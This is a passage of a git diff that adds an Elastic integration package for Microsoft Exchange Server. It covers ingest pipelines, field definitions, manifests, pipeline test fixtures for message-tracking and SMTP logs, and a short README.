,Incoming,,10.11.12.15,10.11.12.14,S:ProxyHop1=exchange-mail.my.domain.com(10.11.12.14);S:MessageValue=MediumHigh;S:Replication=Failed;S:FirstForestHop=exchange-mail.my.domain.com;S:FromEntity=Internet;S:ProxiedClientIPAddress=10.11.12.15;S:ProxiedClientHostname=pve-vhost01.my.domain.com;S:DeliveryPriority=Normal;S:AccountForest=my.domain.com,Email,d6aef52d-0e05-1234-e29b-56dc1db89238,15.02.0330.005", + "microsoft": { + "exchange": { + "connectorid": "exchange-mail\\Default exchange-mail", + "customdata": "S:ProxyHop1=exchange-mail.my.domain.com(10.11.12.14);S:MessageValue=MediumHigh;S:Replication=Failed;S:FirstForestHop=exchange-mail.my.domain.com;S:FromEntity=Internet;S:ProxiedClientIPAddress=10.11.12.15;S:ProxiedClientHostname=pve-vhost01.my.domain.com;S:DeliveryPriority=Normal;S:AccountForest=my.domain.com", + "eventid": "RECEIVE", + "logid": "d6aef52d-0e05-1234-e29b-56dc1db89238", + "messageinfo": "0cA: ", + "networkmessageid": "c95b5dd1-f520-1234-e6dc-56dc1db8914d", + "originalclientip": "10.11.12.15", + "originalserverip": "10.11.12.14", + "recipientcount": 1, + "returnpath": "root@pve-vhost01.my.domain.com", + "schemaversion": "15.02.0330.005", + "source": "SMTP", + "sourcecontext": "08DC1DB12C345BE9;2024-01-25T15:16:12.885Z;0", + "transporttraffictype": "Email" + } + }, + "network": { + "bytes": 8251 + }, + "server": { + "domain": "exchange-mail", + "ip": "10.11.12.14" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-07T00:00:07.463Z", + "client": { + "domain": "exchange", + "ip": "192.168.0.1" + }, + "email": { + "direction": "Originating", + "from": { + "address": [ + "support@example.com" + ] + }, + "local_id": "29519319995411", + "message_id": "20240107001234.567E6224C8@monitor.example.com", + "sender": { + "address": [ + "support@example.com" + ] + }, + "subject": "ein Titel", + "to": { + "address": [ + "uwe.musterman@example.com" + ] + } + }, + "event": { + "ingested": "2024-03-19T09:29:56.855121435Z", + "original": "2024-01-07T00:00:07.463Z,192.168.0.1,exchange,192.168.0.2,exchange.example.com,;250 2.0.0OK20240107001234.567E6224C8@monitor.example.com[Hostname=exchange.example.com];ClientSubmitTime:,Intra-Organization SMTP Send Connector,SMTP,SEND,29519319995411,20240107001234.567E6224C8@monitor.example.com,0b7099ea-cb95-1234-328e-08dc5f139ac8,uwe.musterman@example.com,250 2.1.5Recipient OK,38663,1,,,ein Titel,support@example.com,support@example.com,2024-01-07T00:00:05.535Z;LSRV=exchange.example.com:TOTAL-HUB=1.921|SMR=0.127(SMRDE=0.002|SMRC=0.125(SMRCL=0.105|X-SMRCR=0.125))|CAT=1.698(CATOS=0.018(CATSM=0.017(CATSM-Malware Agent=0.017))|CATRESL=0.004|CATORES=1.567(CATRS=1.566(CATRS-ScanMail Routing Agent=0.117|CATRS-Transport Rule Agent=0.002(X-ETREX=0.002)|CATRS-Index Routing Agent=1.444))|CATORT=0.108(CATRT=0.107(CATRT-Journal Agent=0.107)))|QDM=0.010|SMSC=0.006(X-SMSDR=0.011)|SMS=0.076(SMSMBXD=0.071),Originating,,,,S:E2ELatency=1.928;S:MsgRecipCount=1;S:IncludeInSla=True;S:Microsoft.Exchange.Transport.MailRecipient.RequiredTlsAuthLevel=Opportunistic;S:IsSmtpResponseFromExternalServer=False;S:DeliveryPriority=Normal;S:AccountForest=example.com,Email,a7ae9ef9-e10c-4111-19bf-08dc0f111bee,15.01.2507.035" + }, + "message": "2024-01-07T00:00:07.463Z,192.168.0.1,exchange,192.168.0.2,exchange.example.com,;250 2.0.0OK20240107001234.567E6224C8@monitor.example.com[Hostname=exchange.example.com];ClientSubmitTime:,Intra-Organization SMTP Send Connector,SMTP,SEND,29519319995411,20240107001234.567E6224C8@monitor.example.com,0b7099ea-cb95-1234-328e-08dc5f139ac8,uwe.musterman@example.com,250 2.1.5Recipient OK,38663,1,,,ein Titel,support@example.com,support@example.com,2024-01-07T00:00:05.535Z;LSRV=exchange.example.com:TOTAL-HUB=1.921|SMR=0.127(SMRDE=0.002|SMRC=0.125(SMRCL=0.105|X-SMRCR=0.125))|CAT=1.698(CATOS=0.018(CATSM=0.017(CATSM-Malware Agent=0.017))|CATRESL=0.004|CATORES=1.567(CATRS=1.566(CATRS-ScanMail Routing Agent=0.117|CATRS-Transport Rule Agent=0.002(X-ETREX=0.002)|CATRS-Index Routing Agent=1.444))|CATORT=0.108(CATRT=0.107(CATRT-Journal Agent=0.107)))|QDM=0.010|SMSC=0.006(X-SMSDR=0.011)|SMS=0.076(SMSMBXD=0.071),Originating,,,,S:E2ELatency=1.928;S:MsgRecipCount=1;S:IncludeInSla=True;S:Microsoft.Exchange.Transport.MailRecipient.RequiredTlsAuthLevel=Opportunistic;S:IsSmtpResponseFromExternalServer=False;S:DeliveryPriority=Normal;S:AccountForest=example.com,Email,a7ae9ef9-e10c-4111-19bf-08dc0f111bee,15.01.2507.035", + "microsoft": { + "exchange": { + "connectorid": "Intra-Organization SMTP Send Connector", + "customdata": "S:E2ELatency=1.928;S:MsgRecipCount=1;S:IncludeInSla=True;S:Microsoft.Exchange.Transport.MailRecipient.RequiredTlsAuthLevel=Opportunistic;S:IsSmtpResponseFromExternalServer=False;S:DeliveryPriority=Normal;S:AccountForest=example.com", + "eventid": "SEND", + "logid": "a7ae9ef9-e10c-4111-19bf-08dc0f111bee", + "messageinfo": "2024-01-07T00:00:05.535Z;LSRV=exchange.example.com:TOTAL-HUB=1.921|SMR=0.127(SMRDE=0.002|SMRC=0.125(SMRCL=0.105|X-SMRCR=0.125))|CAT=1.698(CATOS=0.018(CATSM=0.017(CATSM-Malware Agent=0.017))|CATRESL=0.004|CATORES=1.567(CATRS=1.566(CATRS-ScanMail Routing Agent=0.117|CATRS-Transport Rule Agent=0.002(X-ETREX=0.002)|CATRS-Index Routing Agent=1.444))|CATORT=0.108(CATRT=0.107(CATRT-Journal Agent=0.107)))|QDM=0.010|SMSC=0.006(X-SMSDR=0.011)|SMS=0.076(SMSMBXD=0.071)", + "networkmessageid": "0b7099ea-cb95-1234-328e-08dc5f139ac8", + "recipientcount": 1, + "recipientstatus": "250 2.1.5Recipient OK", + "returnpath": "support@example.com", + "schemaversion": "15.01.2507.035", + "source": "SMTP", + "sourcecontext": ";250 2.0.0OK20240107001234.567E6224C8@monitor.example.com[Hostname=exchange.example.com];ClientSubmitTime:", + "transporttraffictype": "Email" + } + }, + "network": { + "bytes": 38663 + }, + "server": { + "domain": "exchange.example.com", + "ip": "192.168.0.2" + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git a/packages/microsoft_exchange_server/data_stream/messagetracking/agent/stream/filestream.yml.hbs b/packages/microsoft_exchange_server/data_stream/messagetracking/agent/stream/filestream.yml.hbs new file mode 100644 index 00000000000..9c5a9235ed8 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/messagetracking/agent/stream/filestream.yml.hbs @@ -0,0 +1,17 @@ +paths: +{{#each paths as |path i|}} + - {{path}} +{{/each}} +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag i|}} + - {{tag}} +{{/each}} +exclude_files: [".gz$"] +processors: + - add_locale: ~ +{{#if processors}} +{{processors}} +{{/if}} diff --git a/packages/microsoft_exchange_server/data_stream/messagetracking/elasticsearch/ingest_pipeline/default.yml b/packages/microsoft_exchange_server/data_stream/messagetracking/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..72a02d020cd --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/messagetracking/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,81 @@ +--- +description: Pipeline for processing Exchange Server Messagetracking logs +processors: +- drop: + if: "ctx.message =~ /^[^0-9]/ || ctx.message =~ /^#/" +- set: + field: event.original + value: "{{{message}}}" +- csv: + field: event.original + ignore_failure: true + ignore_missing: true + target_fields: + - "@timestamp" + - client.ip + - client.domain + - server.ip + - server.domain + - microsoft.exchange.sourcecontext + - microsoft.exchange.connectorid + - microsoft.exchange.source + - microsoft.exchange.eventid + - email.local_id + - email.message_id + - microsoft.exchange.networkmessageid + - email.to.address + - microsoft.exchange.recipientstatus + - network.bytes + - microsoft.exchange.recipientcount + - microsoft.exchange.relatedrecipientaddress + - microsoft.exchange.reference + - email.subject + - microsoft.exchange.senderaddress + - microsoft.exchange.returnpath + - microsoft.exchange.messageinfo + - email.direction + - microsoft.exchange.tenantid + - microsoft.exchange.originalclientip + - microsoft.exchange.originalserverip + - microsoft.exchange.customdata + - microsoft.exchange.transporttraffictype + - microsoft.exchange.logid + - microsoft.exchange.schemaversion + if: ctx.message =~ /^\d/ +- split: + field: email.to.address + separator: ";" + preserve_trailing: true + ignore_missing: true + ignore_failure: true +- append: + field: email.sender.address + value: "{{{microsoft.exchange.senderaddress}}}" + ignore_failure: true +- append: + field: email.from.address + value: "{{{microsoft.exchange.senderaddress}}}" + ignore_failure: true +- remove: + field: microsoft.exchange.senderaddress +- convert: + field: "microsoft.exchange.recipientcount" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "network.bytes" + type: long + ignore_failure: true + ignore_missing: true +- set: + field: event.ingested + value: "{{{_ingest.timestamp}}}" + ignore_failure: true +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/microsoft_exchange_server/data_stream/messagetracking/fields/base-fields.yml b/packages/microsoft_exchange_server/data_stream/messagetracking/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/messagetracking/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/microsoft_exchange_server/data_stream/messagetracking/fields/ecs.yml b/packages/microsoft_exchange_server/data_stream/messagetracking/fields/ecs.yml new file mode 100644 index 00000000000..274f45cc7ba --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/messagetracking/fields/ecs.yml @@ -0,0 +1,28 @@ +- external: ecs + name: message +- external: ecs + name: client.ip +- external: ecs + name: client.domain +- external: ecs + name: server.ip +- external: ecs + name: server.domain +- external: ecs + name: email.to.address +- external: ecs + name: email.sender.address +- external: ecs + name: email.from.address +- external: ecs + name: email.subject +- external: ecs + name: email.direction +- external: ecs + name: email.message_id +- external: ecs + name: email.local_id +- external: ecs + name: network.bytes +- external: ecs + name: tags diff --git a/packages/microsoft_exchange_server/data_stream/messagetracking/fields/fields.yml b/packages/microsoft_exchange_server/data_stream/messagetracking/fields/fields.yml new file mode 100644 index 00000000000..3375724ba18 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/messagetracking/fields/fields.yml @@ -0,0 +1,38 @@ +- name: microsoft.exchange.sourcecontext + type: keyword +- name: microsoft.exchange.connectorid + type: keyword +- name: microsoft.exchange.source + type: keyword +- name: microsoft.exchange.eventid + type: keyword +- name: microsoft.exchange.networkmessageid + type: keyword +- name: microsoft.exchange.recipientstatus + type: keyword +- name: microsoft.exchange.recipientcount + type: long +- name: microsoft.exchange.relatedrecipientaddress + type: ip +- name: microsoft.exchange.reference + type: keyword +- name: microsoft.exchange.returnpath + type: keyword +- name: microsoft.exchange.messageinfo + type: keyword +- name: microsoft.exchange.tenantid + type: keyword +- name: microsoft.exchange.originalclientip + type: ip +- name: microsoft.exchange.originalserverip + type: ip +- name: microsoft.exchange.customdata + type: keyword +- name: microsoft.exchange.transporttraffictype + type: keyword +- name: microsoft.exchange.logid + type: keyword +- name: microsoft.exchange.schemaversion + type: keyword +- name: microsoft.exchange.logtype + type: keyword diff --git a/packages/microsoft_exchange_server/data_stream/messagetracking/manifest.yml b/packages/microsoft_exchange_server/data_stream/messagetracking/manifest.yml new file mode 100644 index 00000000000..d113a8c1a90 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/messagetracking/manifest.yml @@ -0,0 +1,29 @@ +title: "Exchange Messagetracking" +type: logs +streams: + - input: filestream + title: Exchange Messagetracking Logs + description: Collect Exchange Messagetracking logs + vars: + - name: paths + type: text + title: Paths + required: true + multi: true + show_user: true + default: + - "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\TransportRoles\\Logs\\MessageTracking\\*.LOG" + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/fleet/current/elastic-agent-processor-configuration.html) for details. diff --git a/packages/microsoft_exchange_server/data_stream/smtp/_dev/test/pipeline/test-common-config.yml b/packages/microsoft_exchange_server/data_stream/smtp/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..a06dda74051 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/smtp/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,5 @@ +dynamic_fields: + "event.ingested": ".*" +fields: + tags: + - preserve_original_event diff --git a/packages/microsoft_exchange_server/data_stream/smtp/_dev/test/pipeline/test-smtp.json b/packages/microsoft_exchange_server/data_stream/smtp/_dev/test/pipeline/test-smtp.json new file mode 100644 index 00000000000..1ed50a5fcbc --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/smtp/_dev/test/pipeline/test-smtp.json @@ -0,0 +1,60 @@ +{ + "events": [ + { + "log": { + "file": { + "path": "SmtpSend" + } + }, + "message": "2024-01-25T15:14:39.460Z,Inbound Proxy Internal Send Connector,08DC1DB8591B22A0,0,,10.11.12.13:2525,*,None,Set Session Permissions" + }, + { + "log": { + "file": { + "path": "SmtpSend" + } + }, + "message": "2024-01-25T15:14:39.460Z,Inbound Proxy Internal Send Connector,08DC1DB8591B22A0,1,,10.11.12.13:2525,*,,attempting to connect" + }, + { + "log": { + "file": { + "path": "SmtpSend" + } + }, + "message": "2024-01-25T15:14:40.508Z,Inbound Proxy Internal Send Connector,08DC1DB8591B229F,2,,10.11.12.13:2525,*,,\"Failed to connect. Winsock error code: 10061, Win32 error code: 10061, Destination domain: internalproxy, Error Message: No connection could be made because the target machine actively refused it 10.11.12.13:2525.\"" + }, + { + "log": { + "file": { + "path": "SmtpRecive" + } + }, + "message": "2024-01-25T15:14:39.026Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229A,1,10.11.12.13:25,10.11.12.14:53228,>,\"220 my-mail.my.domain.tld Microsoft ESMTP MAIL Service ready at Thu, 25 Jan 2024 16:14:38 +0100\"," + }, + { + "log": { + "file": { + "path": "SmtpRecive" + } + }, + "message": "2024-01-25T15:14:39.026Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229B,0,10.11.12.13:25,10.11.12.14:53230,+,," + }, + { + "log": { + "file": { + "path": "SmtpRecive" + } + }, + "message": "2024-01-25T15:14:39.031Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229A,2,10.11.12.13:25,10.11.12.14:53228,<,EHLO mgt.my.domain.tld," + }, + { + "log": { + "file": { + "path": "SmtpRecive" + } + }, + "message": "2024-01-25T15:14:39.066Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229B,1,10.11.12.13:25,10.11.12.14:53230,>,\"220 my-mail.my.domain.tld Microsoft ESMTP MAIL Service ready at Thu, 25 Jan 2024 16:14:38 +0100\"," + } + ] +} diff --git a/packages/microsoft_exchange_server/data_stream/smtp/_dev/test/pipeline/test-smtp.json-expected.json b/packages/microsoft_exchange_server/data_stream/smtp/_dev/test/pipeline/test-smtp.json-expected.json new file mode 100644 index 00000000000..49bca327506 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/smtp/_dev/test/pipeline/test-smtp.json-expected.json @@ -0,0 +1,193 @@ +{ + "expected": [ + { + "@timestamp": "2024-01-25T15:14:39.460Z", + "event": { + "ingested": "2024-03-06T15:08:18.600372171Z", + "original": "2024-01-25T15:14:39.460Z,Inbound Proxy Internal Send Connector,08DC1DB8591B22A0,0,,10.11.12.13:2525,*,None,Set Session Permissions" + }, + "log": { + "file": { + "path": "SmtpSend" + } + }, + "message": "2024-01-25T15:14:39.460Z,Inbound Proxy Internal Send Connector,08DC1DB8591B22A0,0,,10.11.12.13:2525,*,None,Set Session Permissions", + "microsoft": { + "exchange": { + "connectorid": "Inbound Proxy Internal Send Connector", + "context": "Set Session Permissions", + "data": "None", + "event": "*", + "logtype": "smtpsend", + "remoteendpoint": "10.11.12.13:2525", + "sequencenumber": 0, + "sessionid": "08DC1DB8591B22A0" + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-25T15:14:39.460Z", + "event": { + "ingested": "2024-03-06T15:08:18.600384925Z", + "original": "2024-01-25T15:14:39.460Z,Inbound Proxy Internal Send Connector,08DC1DB8591B22A0,1,,10.11.12.13:2525,*,,attempting to connect" + }, + "log": { + "file": { + "path": "SmtpSend" + } + }, + "message": "2024-01-25T15:14:39.460Z,Inbound Proxy Internal Send Connector,08DC1DB8591B22A0,1,,10.11.12.13:2525,*,,attempting to connect", + "microsoft": { + "exchange": { + "connectorid": "Inbound Proxy Internal Send Connector", + "context": "attempting to connect", + "event": "*", + "logtype": "smtpsend", + "remoteendpoint": "10.11.12.13:2525", + "sequencenumber": 1, + "sessionid": "08DC1DB8591B22A0" + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-25T15:14:40.508Z", + "event": { + "ingested": "2024-03-06T15:08:18.600387259Z", + "original": "2024-01-25T15:14:40.508Z,Inbound Proxy Internal Send Connector,08DC1DB8591B229F,2,,10.11.12.13:2525,*,,\"Failed to connect. Winsock error code: 10061, Win32 error code: 10061, Destination domain: internalproxy, Error Message: No connection could be made because the target machine actively refused it 10.11.12.13:2525.\"" + }, + "log": { + "file": { + "path": "SmtpSend" + } + }, + "message": "2024-01-25T15:14:40.508Z,Inbound Proxy Internal Send Connector,08DC1DB8591B229F,2,,10.11.12.13:2525,*,,\"Failed to connect. Winsock error code: 10061, Win32 error code: 10061, Destination domain: internalproxy, Error Message: No connection could be made because the target machine actively refused it 10.11.12.13:2525.\"", + "microsoft": { + "exchange": { + "connectorid": "Inbound Proxy Internal Send Connector", + "context": "Failed to connect. Winsock error code: 10061, Win32 error code: 10061, Destination domain: internalproxy, Error Message: No connection could be made because the target machine actively refused it 10.11.12.13:2525.", + "event": "*", + "logtype": "smtpsend", + "remoteendpoint": "10.11.12.13:2525", + "sequencenumber": 2, + "sessionid": "08DC1DB8591B229F" + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-25T15:14:39.026Z", + "event": { + "ingested": "2024-03-06T15:08:18.600391894Z", + "original": "2024-01-25T15:14:39.026Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229A,1,10.11.12.13:25,10.11.12.14:53228,>,\"220 my-mail.my.domain.tld Microsoft ESMTP MAIL Service ready at Thu, 25 Jan 2024 16:14:38 +0100\"," + }, + "log": { + "file": { + "path": "SmtpRecive" + } + }, + "message": "2024-01-25T15:14:39.026Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229A,1,10.11.12.13:25,10.11.12.14:53228,>,\"220 my-mail.my.domain.tld Microsoft ESMTP MAIL Service ready at Thu, 25 Jan 2024 16:14:38 +0100\",", + "microsoft": { + "exchange": { + "connectorid": "NETBIOS\\Default Frontend NETBIOS", + "data": "220 my-mail.my.domain.tld Microsoft ESMTP MAIL Service ready at Thu, 25 Jan 2024 16:14:38 +0100", + "event": ">", + "localendpoint": "10.11.12.13:25", + "remoteendpoint": "10.11.12.14:53228", + "sequencenumber": 1, + "sessionid": "08DC1DB8591B229A" + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-25T15:14:39.026Z", + "event": { + "ingested": "2024-03-06T15:08:18.600394286Z", + "original": "2024-01-25T15:14:39.026Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229B,0,10.11.12.13:25,10.11.12.14:53230,+,," + }, + "log": { + "file": { + "path": "SmtpRecive" + } + }, + "message": "2024-01-25T15:14:39.026Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229B,0,10.11.12.13:25,10.11.12.14:53230,+,,", + "microsoft": { + "exchange": { + "connectorid": "NETBIOS\\Default Frontend NETBIOS", + "event": "+", + "localendpoint": "10.11.12.13:25", + "remoteendpoint": "10.11.12.14:53230", + "sequencenumber": 0, + "sessionid": "08DC1DB8591B229B" + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-25T15:14:39.031Z", + "event": { + "ingested": "2024-03-06T15:08:18.600396278Z", + "original": "2024-01-25T15:14:39.031Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229A,2,10.11.12.13:25,10.11.12.14:53228,<,EHLO mgt.my.domain.tld," + }, + "log": { + "file": { + "path": "SmtpRecive" + } + }, + "message": "2024-01-25T15:14:39.031Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229A,2,10.11.12.13:25,10.11.12.14:53228,<,EHLO mgt.my.domain.tld,", + "microsoft": { + "exchange": { + "connectorid": "NETBIOS\\Default Frontend NETBIOS", + "data": "EHLO mgt.my.domain.tld", + "event": "<", + "localendpoint": "10.11.12.13:25", + "remoteendpoint": "10.11.12.14:53228", + "sequencenumber": 2, + "sessionid": "08DC1DB8591B229A" + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-25T15:14:39.066Z", + "event": { + "ingested": "2024-03-06T15:08:18.60039812Z", + "original": "2024-01-25T15:14:39.066Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229B,1,10.11.12.13:25,10.11.12.14:53230,>,\"220 my-mail.my.domain.tld Microsoft ESMTP MAIL Service ready at Thu, 25 Jan 2024 16:14:38 +0100\"," + }, + "log": { + "file": { + "path": "SmtpRecive" + } + }, + "message": "2024-01-25T15:14:39.066Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229B,1,10.11.12.13:25,10.11.12.14:53230,>,\"220 my-mail.my.domain.tld Microsoft ESMTP MAIL Service ready at Thu, 25 Jan 2024 16:14:38 +0100\",", + "microsoft": { + "exchange": { + "connectorid": "NETBIOS\\Default Frontend NETBIOS", + "data": "220 my-mail.my.domain.tld Microsoft ESMTP MAIL Service ready at Thu, 25 Jan 2024 16:14:38 +0100", + "event": ">", + "localendpoint": "10.11.12.13:25", + "remoteendpoint": "10.11.12.14:53230", + "sequencenumber": 1, + "sessionid": "08DC1DB8591B229B" + } + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git a/packages/microsoft_exchange_server/data_stream/smtp/agent/stream/filestream.yml.hbs b/packages/microsoft_exchange_server/data_stream/smtp/agent/stream/filestream.yml.hbs new file mode 100644 index 00000000000..9c5a9235ed8 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/smtp/agent/stream/filestream.yml.hbs @@ -0,0 +1,17 @@ +paths: +{{#each paths as |path i|}} + - {{path}} +{{/each}} +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag i|}} + - {{tag}} +{{/each}} +exclude_files: [".gz$"] +processors: + - add_locale: ~ +{{#if processors}} +{{processors}} +{{/if}} diff --git a/packages/microsoft_exchange_server/data_stream/smtp/elasticsearch/ingest_pipeline/default.yml b/packages/microsoft_exchange_server/data_stream/smtp/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..f398cf32fe5 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/smtp/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,49 @@ +--- +description: Pipeline for processing Exchange Server SMTP Logs +processors: +- drop: + if: "ctx.message =~ /^[^0-9]/ || ctx.message =~ /^#/" +- set: + field: event.original + copy_from: message +- csv: + field: event.original + ignore_failure: true + ignore_missing: true + target_fields: + - "@timestamp" + - microsoft.exchange.connectorid + - microsoft.exchange.sessionid + - microsoft.exchange.sequencenumber + - microsoft.exchange.localendpoint + - microsoft.exchange.remoteendpoint + - microsoft.exchange.event + - microsoft.exchange.data + - microsoft.exchange.context +- set: + field: microsoft.exchange.logtype + if: ctx.log?.file?.path =~ /SmtpSend/ + value: smtpsend + ignore_empty_value: true + ignore_failure: true +- set: + field: microsoft.exchange.logtype + if: ctx.log?.file?.path =~ /SmtpReceive/ + value: smtpreceive + ignore_empty_value: true + ignore_failure: true +- convert: + field: microsoft.exchange.sequencenumber + type: long + ignore_failure: true +- set: + field: event.ingested + copy_from: _ingest.timestamp + ignore_failure: true +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/microsoft_exchange_server/data_stream/smtp/fields/base-fields.yml b/packages/microsoft_exchange_server/data_stream/smtp/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/smtp/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/microsoft_exchange_server/data_stream/smtp/fields/ecs.yml b/packages/microsoft_exchange_server/data_stream/smtp/fields/ecs.yml new file mode 100644 index 00000000000..ddc5f4b0da3 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/smtp/fields/ecs.yml @@ -0,0 +1,6 @@ +- external: ecs + name: message +- external: ecs + name: log.file.path +- external: ecs + name: tags diff --git a/packages/microsoft_exchange_server/data_stream/smtp/fields/fields.yml b/packages/microsoft_exchange_server/data_stream/smtp/fields/fields.yml new file mode 100644 index 00000000000..666f4652f17 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/smtp/fields/fields.yml @@ -0,0 +1,18 @@ +- name: microsoft.exchange.connectorid + type: keyword +- name: microsoft.exchange.sessionid + type: keyword +- name: microsoft.exchange.sequencenumber + type: long +- name: microsoft.exchange.localendpoint + type: keyword +- name: microsoft.exchange.remoteendpoint + type: keyword +- name: microsoft.exchange.event + type: keyword +- name: microsoft.exchange.data + type: keyword +- name: microsoft.exchange.context + type: keyword +- name: microsoft.exchange.logtype + type: keyword diff --git a/packages/microsoft_exchange_server/data_stream/smtp/manifest.yml b/packages/microsoft_exchange_server/data_stream/smtp/manifest.yml new file mode 100644 index 00000000000..2bbee65896b --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/smtp/manifest.yml @@ -0,0 +1,30 @@ +title: "Exchange SMTP" +type: logs +streams: + - input: filestream + title: Exchange SMTP logs + description: Collect Exchange SMTP logs + vars: + - name: paths + type: text + title: Paths + required: true + multi: true + show_user: true + default: + - "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\TransportRoles\\Logs\\Hub\\ProtocolLog\\SmtpSend\\*.LOG" + - "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\TransportRoles\\Logs\\FrontEnd\\ProtocolLog\\SmtpReceive\\*.LOG" + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/fleet/current/elastic-agent-processor-configuration.html) for details. diff --git a/packages/microsoft_exchange_server/docs/README.md b/packages/microsoft_exchange_server/docs/README.md new file mode 100644 index 00000000000..d8a32630041 --- /dev/null +++ b/packages/microsoft_exchange_server/docs/README.md @@ -0,0 +1,25 @@ +# Microsoft Exchange Server +The Microsoft Exchange Server integration allows you to monitor Exchange Server installations. + +## Data streams + +The Microsoft Exchange Server integration collects logs of the following streams: +- Exchange HTTPProxy Logs +- Exchange Server IMAP4 POP3 Logs +- Exchange Messagetracking Logs +- Exchange SMTP logs + +## Requirements + +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. +You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. + +## Setup + +For step-by-step instructions on how to set up an integration, see the +[Getting started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +## Setup Exchange Server + +To collect the SMTP Logs, the logs have to be configured on the exchange Server. To enable it, you can follow this [guide](https://learn.microsoft.com/en-us/exchange/mail-flow/connectors/configure-protocol-logging) +The other logs are enabled by default, and no further configurations are required diff --git a/packages/microsoft_exchange_server/img/exchange.svg b/packages/microsoft_exchange_server/img/exchange.svg new file mode 100644 index 00000000000..ad273e152dc --- /dev/null +++ b/packages/microsoft_exchange_server/img/exchange.svg @@ -0,0 +1,63 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/packages/microsoft_exchange_server/img/screenshot_httpproxy.png b/packages/microsoft_exchange_server/img/screenshot_httpproxy.png new file mode 100644 index 00000000000..e8f1bf3fe91 Binary files /dev/null and b/packages/microsoft_exchange_server/img/screenshot_httpproxy.png differ diff --git a/packages/microsoft_exchange_server/img/screenshot_messagtracking.png b/packages/microsoft_exchange_server/img/screenshot_messagtracking.png new file mode 100644 index 00000000000..7fea4974203 Binary files /dev/null and b/packages/microsoft_exchange_server/img/screenshot_messagtracking.png differ diff --git 